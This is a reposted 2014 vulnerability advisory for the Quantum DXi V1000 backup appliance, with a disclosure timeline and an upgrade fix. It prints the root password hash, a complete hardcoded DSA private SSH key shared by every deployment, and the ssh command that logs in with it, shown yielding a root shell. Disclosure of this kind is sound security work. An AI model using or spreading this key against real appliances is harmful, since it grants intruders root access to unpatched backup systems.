首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quantum DXi V1000 2.2.1 - Static SSH Key
来源:xistence[at]0x90[.]nl 作者:xistence 发布时间:2014-03-20  
-----------
Author:
-----------
  
xistence < xistence[at]0x90[.]nl >
  
-------------------------
Affected products:
-------------------------
  
Quantum DXi V1000 2.2.1 and below
  
-------------------------
Affected vendors:
-------------------------
  
Quantum
http://quantum.com/
  
-------------------------
Product description:
-------------------------
  
Quantum DXi® V-Series is a virtual deduplication backup appliance that
protects physical and
virtual data across remote sites, the datacenter and cloud deployments.
  
----------
Details:
----------
  
[ 0x01 - Default root user ]
  
The root user has a hardcoded password that is unknown and not changeable.
Normally access is only through the restricted shells.
  
The /etc/shadow file shows the following hash:
root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7:::
  
  
[ 0x02 - Known SSH Private Key ]
  
  
The /root/.ssh/authorized_keys on the appliance contains the following key
(same with every deployment):
  
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
+o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
B3Upsx556K/iZPPnJZE=
-----END DSA PRIVATE KEY-----
  
Using the key on a remote system to login through SSH will give a root
shell:
  
$ ssh -i quantum.key root@192.168.2.117
Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71
  
Product Model          = DXiV1000
Hardware Configuration = V1000
System Version         = 2.2.1_MC
Base OS Version        = 2.2.1_MC-9499
Application Version    = 2.2.1_MC-50278
SCM Build Version      = Build14
Kernel Version         = 2.6.18-164.15.1.qtm.4
  
[root@DXi000C29FB1EA1 ~]# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic)
  
  
-----------
Solution:
-----------
  
Upgrade to version 2.3.0.1 or newer
  
--------------
Timeline:
--------------
  
30-09-2013 - Issues discovered and vendor notified
30-09-2013 - Reply from vendor asking for more details
01-10-2013 - Supplied more details how to replicate
19-11-2013 - Asked for status update
19-11-2013 - Reply from vendor that an updated release is due for March 2014
xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released
17-03-2014 - Public disclosure

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Loadbalancer.org Enterprise VA
·Array Networks vAPV / vxAG Cod
·Quantum vmPRO 3.1.2 - Privileg
·Quantum DXi V1000 SSH Private
·SePortal 2.5 - SQL Injection V
·Wireless Drive v1.1.0 iOS - Mu
·MP3Info 0.8.5a - SEH Buffer Ov
·EaseUS Todo Backup 5.8.0.0 Har
·Loadbalancer.org Enterprise VA
·Horde Framework Unserialize PH
·Quantum vmPRO Backdoor Command
·MS14-012 Internet Explorer Tex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved